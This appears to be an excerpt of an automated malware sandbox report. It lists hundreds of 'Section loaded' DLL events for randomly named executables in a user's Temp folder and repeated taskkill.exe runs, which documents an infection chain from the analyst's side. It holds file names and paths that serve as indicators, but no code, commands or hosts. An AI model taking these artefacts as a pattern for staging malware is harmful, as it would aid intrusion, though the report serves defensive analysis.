Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: iertutil.dll
